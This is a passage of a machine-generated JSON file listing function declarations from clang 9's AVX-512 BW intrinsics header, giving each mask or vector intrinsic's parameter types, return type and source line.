}, { "tag": "function", "name": "_kand_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:37:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_kand_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:43:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_kandn_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:49:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_kandn_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:55:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_kor_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:61:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_kor_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:67:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_kxnor_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:73:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_kxnor_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:79:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_kxor_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:85:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_kxor_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:91:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_kortestc_mask32_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:97:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortestz_mask32_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:103:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortest_mask32_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:109:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortestc_mask64_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:115:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortestz_mask64_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:121:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortest_mask64_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktestc_mask32_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:133:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktestz_mask32_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:139:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktest_mask32_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:145:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktestc_mask64_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:151:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktestz_mask64_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:157:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_ktest_mask64_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:163:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kadd_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:169:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_kadd_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:175:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_cvtmask32_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:193:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask32" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_cvtmask64_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:198:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask64" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_cvtu32_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:203:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_cvtu64_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:208:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_load_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:213:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": "__mmask32" } } }], "return-type": { "tag": "__mmask32" } }, { "tag": "function", "name": "_load_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:218:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": "__mmask64" } } }], "return-type": { "tag": "__mmask64" } }, { "tag": "function", "name": "_store_mask32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:223:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": "__mmask32" } } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask32" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_store_mask64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:228:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": "__mmask64" } } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask64" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:375:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:380:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_add_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:387:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:394:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:399:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:406:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:413:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:418:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_add_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:425:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:432:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:437:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:444:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:451:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:456:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:463:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_blend_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:470:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_blend_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:478:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:486:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_abs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:500:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:508:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:514:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_abs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:522:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:530:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:536:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_packs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:544:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:552:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:558:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_packs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:566:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:574:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:580:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:588:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:596:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:602:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_packus_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:610:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:618:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:624:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_adds_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:632:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_adds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:640:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_adds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:646:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } 